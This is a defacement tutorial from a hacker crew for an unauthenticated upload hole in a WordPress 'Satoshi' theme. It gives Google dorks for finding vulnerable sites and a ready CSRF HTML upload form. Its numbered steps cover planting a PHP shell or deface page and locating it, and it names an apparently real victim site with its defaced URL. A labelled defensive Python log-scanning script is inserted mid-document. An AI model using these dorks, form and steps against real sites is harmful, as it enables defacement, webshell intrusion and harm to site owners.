Deface

1. This document provides a tutorial on exploiting a CSRF vulnerability in the WordPress Satoshi theme to upload defacement files. 2. It describes dorks to find websites using the vulnerable theme, and provides an example exploit URL to upload files via CSRF without authentication. 3. A sample CSRF HTML file is included to demonstrate uploading a defacement page through the identified vulnerability.

Uploaded by Anak Baik

DEFACE POC:

WORDPRESS SATOSHI THEME

MATERI/TUTORIAL BY:
MR.Tyr3X

TEAM:
IndoSec

HEY HO WUZZUP GUYS, THIS TIME I'M GIVING YOU DEFACE MATERIAL WITH THE POC
WORDPRESS SATOSHI THEME VULNERABILITY UPLOAD WITH CSRF

SUPPORTED EXTENSIONS:

HTML & PHP

DORK:

-inurl:/wp-content/themes/satoshi/
-intext:Design By Voosh Themes
-inurl:/wp-content/themes/satoshi/
-intext:Design By TecnoGe Informatica

DEVELOP THE DORK TO GET FRESH SITES


==============================================================

Exploit: contoh.com/wp-content/themes/satoshi/upload-file.php

==============================================================

CSRF

<html>
<head>
<title>BCA-X666X-TEAM</title>
<link href="http://fonts.googleapis.com/css?family=Black+Ops+One|Montserrat|Cabin+Sketch|Orbitron|Architects+Daughter|Permanent+Marker|Luckiest+Guy|Cherry+Cream+Soda" rel="stylesheet" />
</head>
<body bgcolor="black">

<center><img src="https://media.giphy.com/media/gHuHATPXBngZfB0pas/giphy.gif" width="963"/></center>

<center><font COLOR="gold" FACE="Black Ops One" SIZE="6">CSRF BY:
<FONT COLOR="red" FACE="Black Ops One" SIZE="6">MR-X666X</font></font>
<br>
<font COLOR="red" FACE="Black Ops One" SIZE="5">{[BLACK CODERS
<FONT COLOR="aqua" FACE="Black Ops One" SIZE="5">ANONYMOUS SATANIC
<FONT COLOR="gold" FACE="Black Ops One" SIZE="5"> EXPLOITER TEAM]}</font></font></font></center>

<br><br><br>

<center><font COLOR="red" FACE="Iceberg" SIZE="6">___________.::
<FONT COLOR="gold" SIZE="6" FACE="Black Ops One">THANKS TO FOR MY FAMILY
<FONT COLOR="red" SIZE="6" FACE="Iceberg">::.___________</font></font></font></center>

<br>
<center><font size="5"><font color="aqua" face="Black Ops One" size="5"><marquee behavior="scroll" direction="left" scrollamount="10" scrolldelay="5" width="100%">[+] MILITARY CYBER CODERS |~| MIDNIGHT ATTACKER TEAM |~| BANYUMAS CYBER TEAM |~| INFINITY CYBER TEAM |~| CYBER TROJAN INDONESIA |~| WHITE EYES ATTACKER [+] </marquee></font></font></center>

<iframe width="0" height="0" scrolling="no" frameborder="no" allow="autoplay" src="https://api.soundcloud.com/tracks/597155748/stream?client_id=a3e059563d7fd3372b49b37f00a00bcf"></iframe>

<form enctype="multipart/form-data" action="http://target.com/wp-content/themes/satoshi/upload-file.php" method="post">
YOUR FILE: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

</body>
</html>

INFORMATION: SAVE THE CSRF WITH THE HTML EXTENSION

EXAMPLE: CSRF.HTML
=======================================

STEP BY STEP:

TARGET SITE:
http://wordsmyth.se/

1. DORKING ON GOOGLE

2. PICK A SITE, THEN ENTER THE EXPLOIT

EXAMPLE OF ENTERING THE EXPLOIT:

https://www.website.com/wp-content/themes/satoshi/upload-file.php

EXPLOITER:
wp-content/themes/satoshi/upload-file.php

INFORMATION:
IF THE PAGE COMES UP BLANK OR EMPTY, IT IS USUALLY VULN

3. GO TO THE CSRF YOU PREPARED, PUT YOUR TARGET SITE INTO THE CSRF
ALONG WITH THE EXPLOIT, OPEN YOUR CSRF, THEN UPLOAD THE SHELL/HTML

4. IF THE UPLOAD SUCCEEDS, THE WORD "SUCCESS" WILL APPEAR

5. THIS IS HOW TO CALL THE DEFACE SCRIPT/SHELL:

[HTML DEFACE SCRIPT]

https://www.website.com/wp-content/themes/satoshi/images/script.html

[PHP SHELL SCRIPT]

https://www.website.com/wp-content/themes/satoshi/images/script.php

IF THERE IS A PATH, DON'T FORGET TO INCLUDE THE PATH TOO, IF THE SITE
USES ONE

6. SINCE I'M ONLY UPLOADING AN HTML DEFACE SCRIPT HERE, I USE THIS WAY
OF CALLING IT
https://www.website.com/wp-content/themes/satoshi/images/script.html

RESULT:
http://wordsmyth.se/wp-content/themes/satoshi/images/!!.html
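The upload handler and the images/ drop directory named in the exploit section and in the step-by-step above leave a distinctive trail in ordinary web server access logs: a GET probe of upload-file.php that returns an empty 200, a POST to the same handler carrying a foreign Referer (the CSRF page is hosted elsewhere), and then a GET of a .html or .php file under images/. The script below is an added example written from the defender's side, not part of the original tutorial. It assumes combined-format (Apache/nginx) access logs; the sample log lines, the IP addresses and the hostnames example.com and attacker.example are constructed for the demonstration.

```python
"""Flag the theme upload-file.php abuse pattern in combined-format access logs."""
import re
from urllib.parse import urlsplit

# Paths taken from the tutorial: the theme's upload handler and the directory it writes into.
UPLOAD_ENDPOINT = "/wp-content/themes/satoshi/upload-file.php"
UPLOAD_DIR = "/wp-content/themes/satoshi/images/"
# The tutorial says the handler accepts HTML and PHP; treat anything renderable or executable as risky.
RISKY_EXT = (".php", ".phtml", ".html", ".htm")

# Apache/nginx "combined" log format; Referer and User-Agent are optional.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Constructed sample log (not real traffic): probe, cross-site POST, payload fetch, then benign noise.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /wp-content/themes/satoshi/upload-file.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:56:01 +0000] "POST /wp-content/themes/satoshi/upload-file.php HTTP/1.1" 200 7 "http://attacker.example/csrf.html" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:56:20 +0000] "GET /wp-content/themes/satoshi/images/!!.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:57:00 +0000] "GET /wp-content/themes/satoshi/images/logo.png HTTP/1.1" 200 5120 "https://example.com/" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:57:05 +0000] "GET /index.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-format access log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    entry["size"] = 0 if entry["size"] == "-" else int(entry["size"])
    entry["path"] = entry["path"].split("?", 1)[0]  # drop the query string before path matching
    return entry


def referer_is_cross_site(referer, site_host):
    """True if the Referer names another host, False if it is our own host, None if absent."""
    if not referer or referer == "-":
        return None
    return urlsplit(referer).hostname != site_host


def find_upload_alerts(lines, site_host):
    """Return one alert dict per suspicious request, in log order."""
    alerts = []
    for line in lines:
        e = parse_line(line)
        if e is None:
            continue
        base = {"ip": e["ip"], "ts": e["ts"], "path": e["path"]}
        if e["path"] == UPLOAD_ENDPOINT and e["method"] == "GET" and e["status"] == 200:
            # The tutorial treats a blank 200 from the handler as the "vulnerable" signal,
            # so a successful GET of it is reconnaissance worth recording.
            alerts.append({**base, "kind": "probe", "cross_site": None})
        elif e["path"] == UPLOAD_ENDPOINT and e["method"] == "POST" and 200 <= e["status"] < 300:
            # A POST whose Referer is a foreign host matches the CSRF page hosted by the attacker.
            alerts.append({**base, "kind": "upload",
                           "cross_site": referer_is_cross_site(e["referer"], site_host)})
        elif (e["method"] == "GET" and e["path"].startswith(UPLOAD_DIR)
              and e["path"].lower().endswith(RISKY_EXT)):
            # Legitimate theme assets under images/ are pictures; HTML/PHP there is the planted file.
            alerts.append({**base, "kind": "payload_access", "cross_site": None})
    return alerts


if __name__ == "__main__":
    for alert in find_upload_alerts(SAMPLE_LOG.splitlines(), "example.com"):
        print(alert)
```

Run it over a real access log by replacing SAMPLE_LOG with the file's lines and site_host with the site's own hostname. A "probe" alone is low severity; an "upload" followed by a "payload_access" from the same IP is the full sequence the tutorial describes, and the path in the payload_access alert is the file to quarantine.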

OK THAT'S ALL, THANK YOU, HOPE IT'S USEFUL AND HOPE YOU CAN UNDERSTAND IT

GO FROM NOOB > MASTER

LET'S GO BUDDY, KEEP SPIRIT AND ALWAYS SMART
#NO_NOOB_NO_MASTER

OK GOOD BYE GUYS

REGARDS:
MR-X666X

TEAM:
BLACK CODERS ANONYMOUS SATANIC EXPLOITER
